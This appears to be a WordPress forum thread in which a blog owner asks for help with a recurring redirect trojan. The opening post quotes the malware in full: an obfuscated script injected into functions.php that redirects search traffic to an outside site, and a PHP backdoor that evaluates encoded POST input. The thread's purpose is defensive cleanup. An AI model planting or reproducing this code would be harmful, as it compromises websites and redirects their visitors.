Can't get rid of a redirecting trojan (7 posts)

  1. alechevallier
    Posted 4 years ago #

    Hi everyone,

    we recently discovered that our WP blog was infected. It is a redirecting trojan that redirects our traffic from search engines to a site (www.googosearch.biz).

    We first identified the redirecting code in the functions.php file, and deleted it. It looked like this:

    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

    But the thing is that it comes back every day ! It looks like another file on our server is generating it every day.

    I found a suspicious file that was added by a russian guy via FTP (I checked the logs) on the root of the site (but note that the site is healthy, only the blog is redirecting) named default.php. It looked like this:

    <?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>"

    I deleted it thinking this code was generating the redirecting code. But it didn't do anything. The evil code is still showing up every morning in the functions.php file !

    Does someone have an idea of how this could be fixed ?

    Thank you for your help,


  2. BeautyPirate
    Posted 4 years ago #

    Try the "WP-Malwatch" plugin. It might tell you where the bugger is. Make sure to select "hidded files" too.

  3. kmessinger
    Forum Moderator
    Posted 4 years ago #

  4. alechevallier
    Posted 4 years ago #

    @BeatyPirate: the WP-Malwatch scan didn't give anything :/

    @kmessinger: thanks for the links, I didn't read all of them. Should I delete the trojan code by the way?

  5. kmessinger
    Forum Moderator
    Posted 4 years ago #

    Delete it here? Yes, if you can still edit your posts.

    You have to be quite agressive in getting rid of this. It will be in multiple files. Check your htaccess and do what those links describe.

  6. gabefair
    Posted 4 years ago #

    @Kmessinger just wondering, why not post the trojan code? Is it dangerous or just a policy? I wonder b/c I would like to search my site for some of the code pieces.

    UPDATE: I found that exact same code in a js file. Thanks for posting it

  7. kmessinger
    Forum Moderator
    Posted 4 years ago #

    Yhy not post the trojan code?

    Because there are some idiots out there that would use the code to infect sites. It is better to search for a common term like "eval(base64_decode" and running virus protection software to scan your site.

    But, that is my opinion. I don't know if there is a formal policy on this but I did see a moderator tell a poster the same thing.

Topic Closed

This topic has been closed to new replies.

About this Topic